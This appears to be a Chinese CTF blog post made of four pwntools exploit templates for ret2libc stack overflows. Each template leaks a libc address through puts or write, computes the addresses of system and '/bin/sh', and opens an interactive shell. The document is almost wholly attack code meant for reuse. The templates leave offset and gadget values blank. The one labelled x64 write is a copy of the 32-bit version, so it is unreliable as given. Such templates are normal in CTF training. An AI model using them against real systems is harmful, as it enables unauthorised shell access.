(1)puts_exp.py
from pwn import *
local = 1
e = ELF("./pwn")
if local == 1:
r = process("./pwn")
#libc = ELF("")
# context(log_level = 'debug')
else :
r = remote("")
libc = ELF("")
# context(log_level = 'debug')
puts_plt_addr = e.plt["puts"]
puts_got_addr = e.got["puts"]
main_addr = e.symbols["main"]
offset =
payload1 = offset*'a' + p32(puts_plt_addr) + p32(main_addr) + p32(puts_got_addr)
#r.recvuntil()
r.sendline(payload1)
puts_addr = u32(r.recv(4))
print(hex(puts_addr))
#pause()
base_addr = puts_addr - libc.symbols["puts"]
system_addr = base_addr + libc.symbols["system"]
binsh_addr = base_addr + libc.search("/bin/sh").next()
payload2 = offset*'a' + p32(system_addr) + p32(main_addr) + p32(binsh_addr)
#r.recvuntil()
r.sendline(payload2)
r.sendline("cat flag")
r.interactive()
(2)puts_x64_exp.py
from pwn import *
local = 1
e = ELF("./pwn")
if local == 1:
r = process("./pwn")
#libc = ELF("")
# context(log_level = 'debug')
else :
r = remote("")
libc = ELF("")
# context(log_level = 'debug')
puts_plt_addr = e.plt["puts"]
puts_got_addr = e.got["puts"]
main_addr = e.symbols["main"]
rdi_addr_ret =
offset =
payload1 = offset*'a' + p64(rdi_addr_ret) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(main_addr)
#r.recvuntil()
r.sendline(payload1)
puts_addr = u64(r.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
print(hex(puts_addr))
#pause()
base_addr = puts_addr - libc.symbols["puts"]
system_addr = base_addr + libc.symbols["system"]
binsh_addr = base_addr + libc.search("/bin/sh").next()
payload2 = offset*'a' + p64(rdi_addr_ret) + p64(binsh_addr) + p64(system_addr) + p64(1)
#r.recvuntil()
r.sendline(payload2)
r.sendline("cat flag")
r.interactive()
(3)write_exp.py
from pwn import *
local = 1
e = ELF("./pwn")
if local == 1:
r = process("./pwn")
#libc = ELF("")
# context(log_level = 'debug')
else :
r = remote("")
libc = ELF("")
# context(log_level = 'debug')
write_plt_addr = e.plt["write"]
write_got_addr = e.got["write"]
main_addr = e.symbols["main"]
offset =
payload = offset*'a' + p32(write_plt_addr) + p32(main_addr) + p32(1) + p32(write_got_addr) + p32(4)
#r.recvuntil()
r.sendline(payload)
write_addr = u32(r.recv(4))
print(hex(write_addr))
#pause()
base_addr = write_addr - libc.symbols["write"]
system_addr = base_addr + libc.symbols["system"]
binsh_addr = base_addr + libc.search("/bin/sh").next()
payload = offset*'a' + p32(system_addr) + p32(1) + p32(binsh_addr)
#r.recvuntil()
r.sendline(payload)
r.sendline("cat flag")
r.interactive()
(4)write_x64_exp.py
from pwn import *
local = 1
e = ELF("./pwn")
if local == 1:
r = process("./pwn")
#libc = ELF("")
# context(log_level = 'debug')
else :
r = remote("")
libc = ELF("")
# context(log_level = 'debug')
write_plt_addr = e.plt["write"]
write_got_addr = e.got["write"]
main_addr = e.symbols["main"]
offset =
payload = offset*'a' + p32(write_plt_addr) + p32(main_addr) + p32(1) + p32(write_got_addr) + p32(4)
#r.recvuntil()
r.sendline(payload)
write_addr = u32(r.recv(4))
print(hex(write_addr))
#pause()
base_addr = write_addr - libc.symbols["write"]
system_addr = base_addr + libc.symbols["system"]
binsh_addr = base_addr + libc.search("/bin/sh").next()
payload = offset*'a' + p32(system_addr) + p32(1) + p32(binsh_addr)
#r.recvuntil()
r.sendline(payload)
r.sendline("cat flag")
r.interactive()
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮箱至 1627319559@qq.com
